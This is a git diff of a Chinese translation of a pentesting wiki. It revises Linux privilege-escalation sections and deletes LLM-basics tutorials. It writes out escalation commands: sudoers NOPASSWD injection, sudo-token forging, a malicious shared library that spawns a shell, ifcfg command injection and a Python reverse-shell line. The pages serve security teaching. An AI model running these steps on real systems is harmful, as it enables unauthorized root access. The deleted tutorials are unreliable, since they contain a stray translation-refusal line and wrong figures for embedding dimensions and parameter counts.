该项目收集了可以被滥用的 Unix 二进制文件的合法功能,以突破受限的 shell,提升或维持提升的权限,传输文件,生成绑定和反向 shell,并促进其他后期利用任务。
|
||||
该项目收集了可以被滥用的 Unix 二进制文件的合法功能,以打破受限的 shell,提升或维持提升的权限,传输文件,生成绑定和反向 shell,并促进其他后期利用任务。
|
||||
|
||||
> gdb -nx -ex '!sh' -ex quit\
|
||||
> sudo mysql -e '! /bin/sh'\
|
||||
@ -947,7 +947,7 @@ sudo su
|
||||
### /var/run/sudo/ts/\<Username>
|
||||
|
||||
如果您在该文件夹或文件夹内创建的任何文件中具有**写权限**,则可以使用二进制文件 [**write_sudo_token**](https://github.com/nongiach/sudo_inject/tree/master/extra_tools) **为用户和PID创建sudo令牌**。\
|
||||
例如,如果您可以覆盖文件 _/var/run/sudo/ts/sampleuser_ 并且您以该用户的身份拥有PID 1234的shell,则可以**获得sudo权限**而无需知道密码,方法是:
|
||||
例如,如果您可以覆盖文件 _/var/run/sudo/ts/sampleuser_ 并且您以该用户的身份拥有PID 1234的shell,您可以**获得sudo权限**而无需知道密码,方法是:
|
||||
```bash
|
||||
./write_sudo_token 1234 > /var/run/sudo/ts/sampleuser
|
||||
```
|
||||
@ -959,7 +959,7 @@ sudo su
|
||||
ls -l /etc/sudoers /etc/sudoers.d/
|
||||
ls -ld /etc/sudoers.d/
|
||||
```
|
||||
如果你会写,你就可以滥用这个权限。
|
||||
如果你会写东西,你就可以滥用这个权限。
|
||||
```bash
|
||||
echo "$(whoami) ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers
|
||||
echo "$(whoami) ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers.d/README
|
||||
@ -1033,7 +1033,7 @@ linux-gate.so.1 => (0x005b0000)
|
||||
libc.so.6 => /var/tmp/flag15/libc.so.6 (0x00110000)
|
||||
/lib/ld-linux.so.2 (0x00737000)
|
||||
```
|
||||
然后在 `/var/tmp` 中创建一个恶意库,使用命令 `gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6`
|
||||
然后在 `/var/tmp` 中创建一个恶意库,使用 `gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6`
|
||||
```c
|
||||
#include<stdlib.h>
|
||||
#define SHELL "/bin/sh"
|
||||
@ -1048,8 +1048,8 @@ execve(file,argv,0);
|
||||
```
|
||||
## Capabilities
|
||||
|
||||
Linux capabilities 提供了一个 **可用根权限的子集给一个进程**。这有效地将根 **权限分解为更小且独特的单元**。每个单元可以独立授予给进程。通过这种方式,完整的权限集被减少,从而降低了被利用的风险。\
|
||||
阅读以下页面以 **了解更多关于能力及其滥用的方法**:
|
||||
Linux capabilities provide a **subset of the available root privileges to a process**. This effectively breaks up root **privileges into smaller and distinctive units**. Each of these units can then be independently granted to processes. This way the full set of privileges is reduced, decreasing the risks of exploitation.\
|
||||
阅读以下页面以**了解更多关于能力及其滥用的方法**:
|
||||
|
||||
{{#ref}}
|
||||
linux-capabilities.md
|
||||
@ -1057,14 +1057,14 @@ linux-capabilities.md
|
||||
|
||||
## Directory permissions
|
||||
|
||||
在一个目录中,**“执行”**位意味着受影响的用户可以“**cd**”进入该文件夹。\
|
||||
**“读取”**位意味着用户可以 **列出** **文件**,而 **“写入”**位意味着用户可以 **删除** 和 **创建** 新的 **文件**。
|
||||
在目录中,**“执行”**位意味着受影响的用户可以“**cd**”进入该文件夹。\
|
||||
**“读取”**位意味着用户可以**列出**文件,而**“写入”**位意味着用户可以**删除**和**创建**新**文件**。
|
||||
|
||||
## ACLs
|
||||
|
||||
访问控制列表 (ACLs) 代表了可自由裁量权限的第二层,能够 **覆盖传统的 ugo/rwx 权限**。这些权限通过允许或拒绝特定用户(非所有者或不属于该组的用户)访问文件或目录,从而增强了对访问的控制。这种 **粒度确保了更精确的访问管理**。更多细节可以在 [**这里**](https://linuxconfig.org/how-to-manage-acls-on-linux) 找到。
|
||||
访问控制列表(ACLs)代表了可自由裁量权限的第二层,能够**覆盖传统的ugo/rwx权限**。这些权限通过允许或拒绝特定用户(非所有者或不属于该组的用户)访问文件或目录,从而增强了对访问的控制。这种**粒度确保了更精确的访问管理**。更多细节可以在[**这里**](https://linuxconfig.org/how-to-manage-acls-on-linux)找到。
|
||||
|
||||
**给予** 用户 "kali" 对一个文件的读取和写入权限:
|
||||
**给予**用户“kali”对文件的读取和写入权限:
|
||||
```bash
|
||||
setfacl -m u:kali:rw file.txt
|
||||
#Set it in /etc/sudoers or /etc/sudoers.d/README (if the dir is included)
|
||||
@ -1077,8 +1077,8 @@ getfacl -t -s -R -p /bin /etc /home /opt /root /sbin /usr /tmp 2>/dev/null
|
||||
```
|
||||
## 打开 shell 会话
|
||||
|
||||
在 **旧版本** 中,您可以 **劫持** 不同用户 (**root**) 的一些 **shell** 会话。\
|
||||
在 **最新版本** 中,您只能 **连接** 到 **您自己用户** 的屏幕会话。然而,您可能会在会话中找到 **有趣的信息**。
|
||||
在 **旧版本** 中,您可能会 **劫持** 其他用户 (**root**) 的一些 **shell** 会话。\
|
||||
在 **最新版本** 中,您将只能 **连接** 到 **您自己的用户** 的屏幕会话。然而,您可能会在会话中找到 **有趣的信息**。
|
||||
|
||||
### 屏幕会话劫持
|
||||
|
||||
@ -1124,7 +1124,7 @@ tmux -S /tmp/dev_sess attach -t 0 #Attach using a non-default tmux socket
|
||||
### Debian OpenSSL 可预测的 PRNG - CVE-2008-0166
|
||||
|
||||
在 2006 年 9 月到 2008 年 5 月 13 日之间,在基于 Debian 的系统(如 Ubuntu、Kubuntu 等)上生成的所有 SSL 和 SSH 密钥可能受到此漏洞的影响。\
|
||||
此漏洞是在这些操作系统中创建新 ssh 密钥时造成的,因为 **仅可能有 32,768 种变体**。这意味着所有可能性都可以计算,并且 **拥有 ssh 公钥后,您可以搜索相应的私钥**。您可以在此处找到计算的可能性:[https://github.com/g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh)
|
||||
此漏洞是在这些操作系统中创建新 ssh 密钥时造成的,因为 **仅有 32,768 种变体是可能的**。这意味着所有可能性都可以计算,并且 **拥有 ssh 公钥后,您可以搜索相应的私钥**。您可以在这里找到计算出的可能性:[https://github.com/g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh)
|
||||
|
||||
### SSH 有趣的配置值
|
||||
|
||||
@ -1163,7 +1163,7 @@ ForwardAgent yes
|
||||
文件 `/etc/ssh_config` 可以 **覆盖** 这些 **选项** 并允许或拒绝此配置。\
|
||||
文件 `/etc/sshd_config` 可以使用关键字 `AllowAgentForwarding` **允许** 或 **拒绝** ssh-agent 转发(默认是允许)。
|
||||
|
||||
如果你发现在某个环境中配置了 Forward Agent,请阅读以下页面,因为 **你可能能够利用它来提升权限**:
|
||||
如果您发现在某个环境中配置了 Forward Agent,请阅读以下页面,因为 **您可能能够利用它来提升权限**:
|
||||
|
||||
{{#ref}}
|
||||
ssh-forward-agent-exploitation.md
|
||||
@ -1173,11 +1173,11 @@ ssh-forward-agent-exploitation.md
|
||||
|
||||
### 配置文件
|
||||
|
||||
文件 `/etc/profile` 和 `/etc/profile.d/` 下的文件是 **在用户运行新 shell 时执行的脚本**。因此,如果你可以 **写入或修改其中任何一个,你可以提升权限**。
|
||||
文件 `/etc/profile` 和 `/etc/profile.d/` 下的文件是 **在用户运行新 shell 时执行的脚本**。因此,如果您可以 **写入或修改其中任何一个,您可以提升权限**。
|
||||
```bash
|
||||
ls -l /etc/profile /etc/profile.d/
|
||||
```
|
||||
如果发现任何奇怪的配置文件脚本,您应该检查其中是否包含**敏感信息**。
|
||||
如果发现任何奇怪的配置文件脚本,您应该检查其中是否包含**敏感细节**。
|
||||
|
||||
### Passwd/Shadow 文件
|
||||
|
||||
@ -1297,7 +1297,7 @@ find /var /etc /bin /sbin /home /usr/local/bin /usr/local/sbin /usr/bin /usr/gam
|
||||
aureport --tty | grep -E "su |sudo " | sed -E "s,su|sudo,${C}[1;31m&${C}[0m,g"
|
||||
grep -RE 'comm="su"|comm="sudo"' /var/log* 2>/dev/null
|
||||
```
|
||||
为了**读取日志,组** [**adm**](interesting-groups-linux-pe/index.html#adm-group) 将非常有帮助。
|
||||
为了**读取日志,组** [**adm**](interesting-groups-linux-pe/index.html#adm-group) 将非常有用。
|
||||
|
||||
### Shell 文件
|
||||
```bash
|
||||
@ -1312,7 +1312,7 @@ grep -RE 'comm="su"|comm="sudo"' /var/log* 2>/dev/null
|
||||
```
|
||||
### Generic Creds Search/Regex
|
||||
|
||||
您还应该检查包含“**password**”的文件,无论是在**名称**中还是在**内容**中,并检查日志中的IP和电子邮件,或哈希正则表达式。\
|
||||
您还应该检查文件名中或内容中包含“**password**”一词的文件,并检查日志中的IP和电子邮件,或哈希正则表达式。\
|
||||
我不会在这里列出如何做到这一切,但如果您感兴趣,可以查看[**linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh)执行的最后检查。
|
||||
|
||||
## Writable files
|
||||
@ -1329,7 +1329,7 @@ import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s
|
||||
|
||||
`logrotate` 中的一个漏洞允许对日志文件或其父目录具有 **写权限** 的用户潜在地获得提升的权限。这是因为 `logrotate` 通常以 **root** 身份运行,可以被操控以执行任意文件,特别是在像 _**/etc/bash_completion.d/**_ 这样的目录中。重要的是要检查 _/var/log_ 中的权限,也要检查应用日志轮换的任何目录。
|
||||
|
||||
> [!NOTE]
|
||||
> [!TIP]
|
||||
> 此漏洞影响 `logrotate` 版本 `3.18.0` 及更早版本
|
||||
|
||||
有关该漏洞的更详细信息可以在此页面找到:[https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition](https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition)。
|
||||
@ -1344,9 +1344,9 @@ import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s
|
||||
|
||||
如果出于某种原因,用户能够 **写入** 一个 `ifcf-<whatever>` 脚本到 _/etc/sysconfig/network-scripts_ **或** 可以 **调整** 一个现有的脚本,那么您的 **系统就被攻陷了**。
|
||||
|
||||
网络脚本,例如 _ifcg-eth0_ 用于网络连接。它们看起来与 .INI 文件完全相同。然而,它们在 Linux 上由网络管理器(dispatcher.d)进行 \~sourced\~。
|
||||
网络脚本,例如 _ifcg-eth0_ 用于网络连接。它们看起来与 .INI 文件完全相同。然而,它们在 Linux 中由网络管理器(dispatcher.d)进行 \~sourced\~。
|
||||
|
||||
在我的案例中,这些网络脚本中的 `NAME=` 属性处理不当。如果您在名称中有 **空白/空格,系统会尝试执行空白/空格后面的部分**。这意味着 **第一个空格后面的所有内容都以 root 身份执行**。
|
||||
在我的案例中,这些网络脚本中的 `NAME=` 属性处理不当。如果您在名称中有 **空格**,系统会尝试执行空格后的部分。这意味着 **第一个空格后的所有内容都以 root 身份执行**。
|
||||
|
||||
例如: _/etc/sysconfig/network-scripts/ifcfg-1337_
|
||||
```bash
|
||||
@ -1356,11 +1356,11 @@ DEVICE=eth0
|
||||
```
|
||||
### **init, init.d, systemd 和 rc.d**
|
||||
|
||||
目录 `/etc/init.d` 是 **System V init (SysVinit)** 的 **脚本** 的家,**经典的 Linux 服务管理系统**。它包括用于 `start`、`stop`、`restart` 和有时 `reload` 服务的脚本。这些可以直接执行或通过在 `/etc/rc?.d/` 中找到的符号链接执行。在 Redhat 系统中,另一个路径是 `/etc/rc.d/init.d`。
|
||||
目录 `/etc/init.d` 是 **System V init (SysVinit)** 的 **脚本** 所在地,这是 **经典的 Linux 服务管理系统**。它包含用于 `启动`、`停止`、`重启`,有时还会 `重新加载` 服务的脚本。这些脚本可以直接执行或通过在 `/etc/rc?.d/` 中找到的符号链接执行。在 Redhat 系统中,另一个路径是 `/etc/rc.d/init.d`。
|
||||
|
||||
另一方面,`/etc/init` 与 **Upstart** 相关,这是 Ubuntu 引入的较新的 **服务管理**,使用配置文件进行服务管理任务。尽管过渡到 Upstart,SysVinit 脚本仍然与 Upstart 配置一起使用,因为 Upstart 中有一个兼容层。
|
||||
另一方面,`/etc/init` 与 **Upstart** 相关,这是由 Ubuntu 引入的较新的 **服务管理**,使用配置文件进行服务管理任务。尽管已经过渡到 Upstart,但由于 Upstart 中的兼容性层,SysVinit 脚本仍与 Upstart 配置一起使用。
|
||||
|
||||
**systemd** 作为现代初始化和服务管理器出现,提供了高级功能,如按需守护进程启动、自动挂载管理和系统状态快照。它将文件组织到 `/usr/lib/systemd/` 以供分发包使用,并将 `/etc/systemd/system/` 用于管理员修改,从而简化系统管理过程。
|
||||
**systemd** 作为现代初始化和服务管理器出现,提供了高级功能,如按需守护进程启动、自动挂载管理和系统状态快照。它将文件组织到 `/usr/lib/systemd/` 以供分发包使用,并将 `/etc/systemd/system/` 用于管理员修改,从而简化了系统管理过程。
|
||||
|
||||
## 其他技巧
|
||||
|
||||
@ -1397,7 +1397,7 @@ cisco-vmanage.md
|
||||
|
||||
**LinEnum**: [https://github.com/rebootuser/LinEnum](https://github.com/rebootuser/LinEnum)(-t 选项)\
|
||||
**Enumy**: [https://github.com/luke-goddard/enumy](https://github.com/luke-goddard/enumy)\
|
||||
**Unix 权限检查:** [http://pentestmonkey.net/tools/audit/unix-privesc-check](http://pentestmonkey.net/tools/audit/unix-privesc-check)\
|
||||
**Unix 权限提升检查:** [http://pentestmonkey.net/tools/audit/unix-privesc-check](http://pentestmonkey.net/tools/audit/unix-privesc-check)\
|
||||
**Linux 权限检查器:** [www.securitysift.com/download/linuxprivchecker.py](http://www.securitysift.com/download/linuxprivchecker.py)\
|
||||
**BeeRoot:** [https://github.com/AlessandroZ/BeRoot/tree/master/Linux](https://github.com/AlessandroZ/BeRoot/tree/master/Linux)\
|
||||
**Kernelpop:** 在 Linux 和 MAC 中枚举内核漏洞 [https://github.com/spencerdodd/kernelpop](https://github.com/spencerdodd/kernelpop)\
|
||||
|
||||
@ -1,285 +0,0 @@
|
||||
# 0. 基本 LLM 概念
|
||||
|
||||
## 预训练
|
||||
|
||||
预训练是开发大型语言模型(LLM)的基础阶段,在此阶段,模型接触到大量多样的文本数据。在此阶段,**LLM 学习语言的基本结构、模式和细微差别**,包括语法、词汇、句法和上下文关系。通过处理这些广泛的数据,模型获得了对语言和一般世界知识的广泛理解。这一全面的基础使 LLM 能够生成连贯且上下文相关的文本。随后,这个预训练的模型可以进行微调,进一步在专业数据集上进行训练,以适应其在特定任务或领域的能力,从而提高其在目标应用中的性能和相关性。
|
||||
|
||||
## 主要 LLM 组件
|
||||
|
||||
通常,LLM 的特征是用于训练的配置。以下是训练 LLM 时的常见组件:
|
||||
|
||||
- **参数**:参数是神经网络中的**可学习权重和偏差**。这些是训练过程调整以最小化损失函数并提高模型在任务上表现的数字。LLM 通常使用数百万个参数。
|
||||
- **上下文长度**:这是用于预训练 LLM 的每个句子的最大长度。
|
||||
- **嵌入维度**:用于表示每个标记或单词的向量大小。LLM 通常使用数十亿个维度。
|
||||
- **隐藏维度**:神经网络中隐藏层的大小。
|
||||
- **层数(深度)**:模型的层数。LLM 通常使用数十层。
|
||||
- **注意力头数**:在变换器模型中,这是每层中使用的独立注意力机制的数量。LLM 通常使用数十个头。
|
||||
- **丢弃率**:丢弃率类似于在训练过程中移除的数据百分比(概率变为 0),用于**防止过拟合**。LLM 通常使用 0-20% 之间的丢弃率。
|
||||
|
||||
GPT-2 模型的配置:
|
||||
```json
|
||||
GPT_CONFIG_124M = {
|
||||
"vocab_size": 50257, // Vocabulary size of the BPE tokenizer
|
||||
"context_length": 1024, // Context length
|
||||
"emb_dim": 768, // Embedding dimension
|
||||
"n_heads": 12, // Number of attention heads
|
||||
"n_layers": 12, // Number of layers
|
||||
"drop_rate": 0.1, // Dropout rate: 10%
|
||||
"qkv_bias": False // Query-Key-Value bias
|
||||
}
|
||||
```
|
||||
## Tensors in PyTorch
|
||||
|
||||
在 PyTorch 中,**tensor** 是一种基本数据结构,作为多维数组,推广了标量、向量和矩阵等概念到更高的维度。张量是数据在 PyTorch 中表示和操作的主要方式,特别是在深度学习和神经网络的背景下。
|
||||
|
||||
### Mathematical Concept of Tensors
|
||||
|
||||
- **Scalars**: 0 阶张量,表示一个单一数字(零维)。例如:5
|
||||
- **Vectors**: 1 阶张量,表示一维数字数组。例如:\[5,1]
|
||||
- **Matrices**: 2 阶张量,表示具有行和列的二维数组。例如:\[\[1,3], \[5,2]]
|
||||
- **Higher-Rank Tensors**: 3 阶或更高阶的张量,表示更高维度的数据(例如,3D 张量用于彩色图像)。
|
||||
|
||||
### Tensors as Data Containers
|
||||
|
||||
从计算的角度来看,张量充当多维数据的容器,其中每个维度可以表示数据的不同特征或方面。这使得张量非常适合处理机器学习任务中的复杂数据集。
|
||||
|
||||
### PyTorch Tensors vs. NumPy Arrays
|
||||
|
||||
虽然 PyTorch 张量在存储和操作数值数据的能力上与 NumPy 数组相似,但它们提供了深度学习所需的额外功能:
|
||||
|
||||
- **Automatic Differentiation**: PyTorch 张量支持自动计算梯度(autograd),简化了训练神经网络所需的导数计算过程。
|
||||
- **GPU Acceleration**: PyTorch 中的张量可以移动到 GPU 上进行计算,显著加快大规模计算的速度。
|
||||
|
||||
### Creating Tensors in PyTorch
|
||||
|
||||
您可以使用 `torch.tensor` 函数创建张量:
|
||||
```python
|
||||
pythonCopy codeimport torch
|
||||
|
||||
# Scalar (0D tensor)
|
||||
tensor0d = torch.tensor(1)
|
||||
|
||||
# Vector (1D tensor)
|
||||
tensor1d = torch.tensor([1, 2, 3])
|
||||
|
||||
# Matrix (2D tensor)
|
||||
tensor2d = torch.tensor([[1, 2],
|
||||
[3, 4]])
|
||||
|
||||
# 3D Tensor
|
||||
tensor3d = torch.tensor([[[1, 2], [3, 4]],
|
||||
[[5, 6], [7, 8]]])
|
||||
```
|
||||
### Tensor 数据类型
|
||||
|
||||
PyTorch 张量可以存储各种类型的数据,例如整数和浮点数。
|
||||
|
||||
您可以使用 `.dtype` 属性检查张量的数据类型:
|
||||
```python
|
||||
tensor1d = torch.tensor([1, 2, 3])
|
||||
print(tensor1d.dtype) # Output: torch.int64
|
||||
```
|
||||
- 从 Python 整数创建的张量类型为 `torch.int64`。
|
||||
- 从 Python 浮点数创建的张量类型为 `torch.float32`。
|
||||
|
||||
要更改张量的数据类型,请使用 `.to()` 方法:
|
||||
```python
|
||||
float_tensor = tensor1d.to(torch.float32)
|
||||
print(float_tensor.dtype) # Output: torch.float32
|
||||
```
|
||||
### 常见的张量操作
|
||||
|
||||
PyTorch 提供了多种操作来处理张量:
|
||||
|
||||
- **访问形状**:使用 `.shape` 获取张量的维度。
|
||||
|
||||
```python
|
||||
print(tensor2d.shape) # 输出: torch.Size([2, 2])
|
||||
```
|
||||
|
||||
- **重塑张量**:使用 `.reshape()` 或 `.view()` 改变形状。
|
||||
|
||||
```python
|
||||
reshaped = tensor2d.reshape(4, 1)
|
||||
```
|
||||
|
||||
- **转置张量**:使用 `.T` 转置 2D 张量。
|
||||
|
||||
```python
|
||||
transposed = tensor2d.T
|
||||
```
|
||||
|
||||
- **矩阵乘法**:使用 `.matmul()` 或 `@` 运算符。
|
||||
|
||||
```python
|
||||
result = tensor2d @ tensor2d.T
|
||||
```
|
||||
|
||||
### 在深度学习中的重要性
|
||||
|
||||
张量在 PyTorch 中对于构建和训练神经网络至关重要:
|
||||
|
||||
- 它们存储输入数据、权重和偏差。
|
||||
- 它们促进训练算法中前向和后向传播所需的操作。
|
||||
- 通过 autograd,张量使得梯度的自动计算成为可能,从而简化了优化过程。
|
||||
|
||||
## 自动微分
|
||||
|
||||
自动微分(AD)是一种计算技术,用于**高效且准确地评估函数的导数(梯度)**。在神经网络的上下文中,AD 使得计算**像梯度下降这样的优化算法所需的梯度**成为可能。PyTorch 提供了一个名为 **autograd** 的自动微分引擎,简化了这个过程。
|
||||
|
||||
### 自动微分的数学解释
|
||||
|
||||
**1. 链式法则**
|
||||
|
||||
自动微分的核心是微积分中的 **链式法则**。链式法则指出,如果你有一个函数的复合,复合函数的导数是组成函数导数的乘积。
|
||||
|
||||
在数学上,如果 `y=f(u)` 且 `u=g(x)`,那么 `y` 关于 `x` 的导数为:
|
||||
|
||||
<figure><img src="../../images/image (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**2. 计算图**
|
||||
|
||||
在 AD 中,计算被表示为 **计算图** 中的节点,每个节点对应一个操作或变量。通过遍历这个图,我们可以高效地计算导数。
|
||||
|
||||
3. 示例
|
||||
|
||||
让我们考虑一个简单的函数:
|
||||
|
||||
<figure><img src="../../images/image (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
其中:
|
||||
|
||||
- `σ(z)` 是 sigmoid 函数。
|
||||
- `y=1.0` 是目标标签。
|
||||
- `L` 是损失。
|
||||
|
||||
我们想要计算损失 `L` 关于权重 `w` 和偏差 `b` 的梯度。
|
||||
|
||||
**4. 手动计算梯度**
|
||||
|
||||
<figure><img src="../../images/image (2) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**5. 数值计算**
|
||||
|
||||
<figure><img src="../../images/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
### 在 PyTorch 中实现自动微分
|
||||
|
||||
现在,让我们看看 PyTorch 如何自动化这个过程。
|
||||
```python
|
||||
pythonCopy codeimport torch
|
||||
import torch.nn.functional as F
|
||||
|
||||
# Define input and target
|
||||
x = torch.tensor([1.1])
|
||||
y = torch.tensor([1.0])
|
||||
|
||||
# Initialize weights with requires_grad=True to track computations
|
||||
w = torch.tensor([2.2], requires_grad=True)
|
||||
b = torch.tensor([0.0], requires_grad=True)
|
||||
|
||||
# Forward pass
|
||||
z = x * w + b
|
||||
a = torch.sigmoid(z)
|
||||
loss = F.binary_cross_entropy(a, y)
|
||||
|
||||
# Backward pass
|
||||
loss.backward()
|
||||
|
||||
# Gradients
|
||||
print("Gradient w.r.t w:", w.grad)
|
||||
print("Gradient w.r.t b:", b.grad)
|
||||
```
|
||||
抱歉,我无法提供该内容的翻译。
|
||||
```css
|
||||
cssCopy codeGradient w.r.t w: tensor([-0.0898])
|
||||
Gradient w.r.t b: tensor([-0.0817])
|
||||
```
|
||||
## 在更大神经网络中的反向传播
|
||||
|
||||
### **1. 扩展到多层网络**
|
||||
|
||||
在具有多个层的大型神经网络中,由于参数和操作数量的增加,计算梯度的过程变得更加复杂。然而,基本原理保持不变:
|
||||
|
||||
- **前向传播:** 通过每一层传递输入来计算网络的输出。
|
||||
- **计算损失:** 使用网络的输出和目标标签评估损失函数。
|
||||
- **反向传播(Backpropagation):** 通过从输出层递归应用链式法则,计算损失相对于网络中每个参数的梯度,直到输入层。
|
||||
|
||||
### **2. 反向传播算法**
|
||||
|
||||
- **步骤 1:** 初始化网络参数(权重和偏置)。
|
||||
- **步骤 2:** 对于每个训练样本,执行前向传播以计算输出。
|
||||
- **步骤 3:** 计算损失。
|
||||
- **步骤 4:** 使用链式法则计算损失相对于每个参数的梯度。
|
||||
- **步骤 5:** 使用优化算法(例如,梯度下降)更新参数。
|
||||
|
||||
### **3. 数学表示**
|
||||
|
||||
考虑一个具有一个隐藏层的简单神经网络:
|
||||
|
||||
<figure><img src="../../images/image (5) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
### **4. PyTorch 实现**
|
||||
|
||||
PyTorch 通过其自动求导引擎简化了这个过程。
|
||||
```python
|
||||
import torch
|
||||
import torch.nn as nn
|
||||
import torch.optim as optim
|
||||
|
||||
# Define a simple neural network
|
||||
class SimpleNet(nn.Module):
|
||||
def __init__(self):
|
||||
super(SimpleNet, self).__init__()
|
||||
self.fc1 = nn.Linear(10, 5) # Input layer to hidden layer
|
||||
self.relu = nn.ReLU()
|
||||
self.fc2 = nn.Linear(5, 1) # Hidden layer to output layer
|
||||
self.sigmoid = nn.Sigmoid()
|
||||
|
||||
def forward(self, x):
|
||||
h = self.relu(self.fc1(x))
|
||||
y_hat = self.sigmoid(self.fc2(h))
|
||||
return y_hat
|
||||
|
||||
# Instantiate the network
|
||||
net = SimpleNet()
|
||||
|
||||
# Define loss function and optimizer
|
||||
criterion = nn.BCELoss()
|
||||
optimizer = optim.SGD(net.parameters(), lr=0.01)
|
||||
|
||||
# Sample data
|
||||
inputs = torch.randn(1, 10)
|
||||
labels = torch.tensor([1.0])
|
||||
|
||||
# Training loop
|
||||
optimizer.zero_grad() # Clear gradients
|
||||
outputs = net(inputs) # Forward pass
|
||||
loss = criterion(outputs, labels) # Compute loss
|
||||
loss.backward() # Backward pass (compute gradients)
|
||||
optimizer.step() # Update parameters
|
||||
|
||||
# Accessing gradients
|
||||
for name, param in net.named_parameters():
|
||||
if param.requires_grad:
|
||||
print(f"Gradient of {name}: {param.grad}")
|
||||
```
|
||||
在这段代码中:
|
||||
|
||||
- **前向传播:** 计算网络的输出。
|
||||
- **反向传播:** `loss.backward()` 计算损失相对于所有参数的梯度。
|
||||
- **参数更新:** `optimizer.step()` 根据计算出的梯度更新参数。
|
||||
|
||||
### **5. 理解反向传播**
|
||||
|
||||
在反向传播过程中:
|
||||
|
||||
- PyTorch 以相反的顺序遍历计算图。
|
||||
- 对于每个操作,它应用链式法则来计算梯度。
|
||||
- 梯度被累积在每个参数张量的 `.grad` 属性中。
|
||||
|
||||
### **6. 自动微分的优点**
|
||||
|
||||
- **效率:** 通过重用中间结果避免冗余计算。
|
||||
- **准确性:** 提供精确的导数,达到机器精度。
|
||||
- **易用性:** 消除了手动计算导数的需要。
|
||||
@ -1,95 +0,0 @@
|
||||
# 1. Tokenizing
|
||||
|
||||
## Tokenizing
|
||||
|
||||
**Tokenizing** 是将数据(如文本)分解为更小、可管理的部分,称为 _tokens_ 的过程。每个 token 都会被分配一个唯一的数字标识符(ID)。这是为机器学习模型处理文本做准备的基本步骤,尤其是在自然语言处理(NLP)中。
|
||||
|
||||
> [!TIP]
|
||||
> 这个初始阶段的目标非常简单:**以某种合理的方式将输入划分为 tokens(ids)**。
|
||||
|
||||
### **How Tokenizing Works**
|
||||
|
||||
1. **Splitting the Text:**
|
||||
- **Basic Tokenizer:** 一个简单的 tokenizer 可能会将文本拆分为单个单词和标点符号,去除空格。
|
||||
- _Example:_\
|
||||
文本: `"Hello, world!"`\
|
||||
Tokens: `["Hello", ",", "world", "!"]`
|
||||
2. **Creating a Vocabulary:**
|
||||
- 为了将 tokens 转换为数字 ID,创建一个 **vocabulary**。这个 vocabulary 列出了所有唯一的 tokens(单词和符号),并为每个 token 分配一个特定的 ID。
|
||||
- **Special Tokens:** 这些是添加到 vocabulary 中以处理各种场景的特殊符号:
|
||||
- `[BOS]`(开始序列):表示文本的开始。
|
||||
- `[EOS]`(结束序列):表示文本的结束。
|
||||
- `[PAD]`(填充):用于使批次中的所有序列具有相同的长度。
|
||||
- `[UNK]`(未知):表示不在 vocabulary 中的 tokens。
|
||||
- _Example:_\
|
||||
如果 `"Hello"` 被分配 ID `64`,`","` 是 `455`,`"world"` 是 `78`,`"!"` 是 `467`,那么:\
|
||||
`"Hello, world!"` → `[64, 455, 78, 467]`
|
||||
- **Handling Unknown Words:**\
|
||||
如果像 `"Bye"` 这样的单词不在 vocabulary 中,它将被替换为 `[UNK]`。\
|
||||
`"Bye, world!"` → `["[UNK]", ",", "world", "!"]` → `[987, 455, 78, 467]`\
|
||||
_(假设 `[UNK]` 的 ID 是 `987`)_
|
||||
|
||||
### **Advanced Tokenizing Methods**
|
||||
|
||||
虽然基本的 tokenizer 对于简单文本效果良好,但在处理大型 vocabulary 和新词或稀有词时存在局限性。高级 tokenizing 方法通过将文本分解为更小的子单元或优化 tokenization 过程来解决这些问题。
|
||||
|
||||
1. **Byte Pair Encoding (BPE):**
|
||||
- **Purpose:** 通过将稀有或未知单词分解为频繁出现的字节对,减少 vocabulary 的大小并处理稀有或未知单词。
|
||||
- **How It Works:**
|
||||
- 从单个字符作为 tokens 开始。
|
||||
- 迭代地将最频繁的 token 对合并为一个单一的 token。
|
||||
- 继续直到没有更多频繁的对可以合并。
|
||||
- **Benefits:**
|
||||
- 消除了对 `[UNK]` token 的需求,因为所有单词都可以通过组合现有的子词 tokens 来表示。
|
||||
- 更高效和灵活的 vocabulary。
|
||||
- _Example:_\
|
||||
`"playing"` 可能被 tokenized 为 `["play", "ing"]`,如果 `"play"` 和 `"ing"` 是频繁的子词。
|
||||
2. **WordPiece:**
|
||||
- **Used By:** 像 BERT 这样的模型。
|
||||
- **Purpose:** 类似于 BPE,它将单词分解为子词单元,以处理未知单词并减少 vocabulary 大小。
|
||||
- **How It Works:**
|
||||
- 从单个字符的基础 vocabulary 开始。
|
||||
- 迭代地添加最频繁的子词,以最大化训练数据的可能性。
|
||||
- 使用概率模型决定合并哪些子词。
|
||||
- **Benefits:**
|
||||
- 在拥有可管理的 vocabulary 大小和有效表示单词之间取得平衡。
|
||||
- 高效处理稀有和复合单词。
|
||||
- _Example:_\
|
||||
`"unhappiness"` 可能被 tokenized 为 `["un", "happiness"]` 或 `["un", "happy", "ness"]`,具体取决于 vocabulary。
|
||||
3. **Unigram Language Model:**
|
||||
- **Used By:** 像 SentencePiece 这样的模型。
|
||||
- **Purpose:** 使用概率模型确定最可能的子词 tokens 集合。
|
||||
- **How It Works:**
|
||||
- 从一组潜在的 tokens 开始。
|
||||
- 迭代地移除那些对模型的训练数据概率提升最小的 tokens。
|
||||
- 最终确定一个 vocabulary,其中每个单词由最可能的子词单元表示。
|
||||
- **Benefits:**
|
||||
- 灵活且可以更自然地建模语言。
|
||||
- 通常会导致更高效和紧凑的 tokenizations。
|
||||
- _Example:_\
|
||||
